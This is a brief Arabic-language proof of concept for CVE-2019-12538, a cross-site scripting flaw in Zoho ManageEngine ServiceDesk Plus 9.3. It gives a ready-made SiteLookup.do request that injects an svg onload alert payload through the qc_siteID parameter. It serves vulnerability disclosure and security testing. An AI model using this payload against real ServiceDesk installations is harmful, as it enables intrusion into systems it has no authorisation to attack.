
إثبات المفهوم لـ CVE-2019-12538: ثغرة XSS في Zoho ManageEngine ServiceDesk Plus 9.3 عبر معلمة qc_siteID في SiteLookup.do. يتضمن حمولة للاختبار الأمني.
وصف المعلومات: تم اكتشاف مشكلة في Zoho ManageEngine ServiceDesk Plus 9.3. هناك ثغرة XSS عبر معامل qc_siteID في SiteLookup.do.
المؤلف: Concobe من فريق Tarantula - VinCSS (عضو في Vingroup)
domain/SiteLookup.do?configID=0&SELECTSITE=qc_siteID"/><svg onload=alert('XSS')>&userConfigID=1&SELECTEDSITEID=1&SELECTEDSITENAME=